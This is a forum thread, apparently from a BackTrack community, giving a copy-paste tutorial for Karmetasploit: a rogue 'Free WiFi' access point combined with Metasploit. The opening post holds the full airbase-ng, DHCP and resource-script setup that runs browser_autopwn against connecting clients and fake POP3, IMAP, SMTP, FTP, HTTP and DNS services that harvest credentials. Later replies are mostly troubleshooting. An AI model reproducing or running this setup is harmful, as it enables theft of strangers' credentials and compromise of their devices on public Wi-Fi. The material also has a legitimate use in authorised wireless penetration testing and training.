Karmetasploit Howto

[floyd]

I was bored by Wireless Cracking, so I wanted to try something different. I found Karmetasploit. It's nothing very challenging and I just copy and paste the information from Karmetasploit – Metasploit and skipped/included things to fit to BT 4 Pre Final! But maybe it's useful for someone...

Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerfull Metasploit. This is how it worked for me:

First you could update your system with apt-get update && apt-get updgrade.

Then make sure that injection is working:

Code:

airmon-ng start [wifi-interface]

eg. airmon-ng start wlan0

Code:

aireplay-ng --test [monitor-interface]

eg. aireplay-ng --test mon0

If you only have 0 percent values, you likely need to fix your card so that injection works. Then set up the dhcp service:

Code:

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak

And write a new dhcpd.conf:

Code:

nano /etc/dhcp3/dhcpd.conf

Write in the following:

Code:

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

The next step is to...

.. set up a "Free" Wifi ...

Code:

airbase-ng -P -C 30 -e "Free WiFi" -v [monitor-interface]

... configure interface ...

Code:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

... configure dhcp for the at0 interface

Code:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

You can ignore the error. Then you can place a new file, let's say to /root

Code:

nano /root/karma.rc

with the following content

Code:

load db_sqlite3
db_create /root/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run


use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run

use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run

To start to exploit you can run

Code:

/pentest/exploits/framework3/msfconsole -r /root/karma.rc

As soon as somebody (make sure that's you) connects, you get some messages on the screen. When you hit enter you get the metasploit console, where you can type db_notes to see captured credentials. You could also use tcpdump at the at0 interface to capture the hole traffic.

The interesting thing is, to use another machine, connect to the "Free Wifi" and then try to reach a https page (deactivate NoScript and add an exception for the certificate!). You can see how metasploit tries to exploit the other machine.

I'm very interested in any feedback or how I could develop my evil AP further on...

[pingu]

Well compiled, thanks!

[phoenix910]

Thanks, I haven't actually tried this out yet, but may do say later on Appreciate it!

~phoenix910

[dragracekid]

I ran this and it seemed to work very nicely but I do have one problem when i tried to change my dhcpd.conf to a .bak file it didnt save and now whenever I start backtrack it says dhcp3 failed im not sure what it really does but does anyone have there backup of it that they could send me or post just to be safe?

[m-1-k-3]

Quote:

Originally Posted by dragracekid

I ran this and it seemed to work very nicely but I do have one problem when i tried to change my dhcpd.conf to a .bak file it didnt save and now whenever I start backtrack it says dhcp3 failed im not sure what it really does but does anyone have there backup of it that they could send me or post just to be safe?

boot the live cd and copy it from there ...

m-1-k-3

[#mfBaranian#]

You can just remove dhcp from startup services.

Code:

# update-rc.d -f dhcp3-server remove

[dragracekid]

Quote:

Originally Posted by m-1-k-3

boot the live cd and copy it from there ...

m-1-k-3

didnt even think about that I feel dumb lol

[sylvestor2002]

when I try to run the following command:

airbase-ng -P -C 30 -e "Free WiFi" -v ath0

I get an error message saying something about the "P" option does not exist. I checked the help and noticed that the "P" & "C" options are not listed. (It did exist before, but I ran the "apt-get update && apt-get upgrade" command and that's when airbase seems to have changed.)

airbase-ng

Airbase-ng 1.0 rc1 - (C) 2008 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org

usage: airbase-ng <options> <replay interface>

Options:

-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file

Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file

--help : Displays this usage screen

No replay interface specified.

[Eatme]

is this something similar to the Karma.sh script. Where you make a fake AP and DOS the Targeted AP to go offline, so that the user will be directed to a fake login page or something like that and will have the user put in a user name or the WPA ???

hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html

[archangel.amael]

Quote:

Originally Posted by Eatme

is this something similar to the Karma.sh script. Where you make a fake AP and DOS the Targeted AP to go offline, so that the user will be directed to a fake login page or something like that and will have the user put in a user name or the WPA ???

hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html

Pay attention, read a little bit and comprehend what you read. Instead of making useless posts
The first post states what this thread is about.

Quote:

Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerfull Metasploit.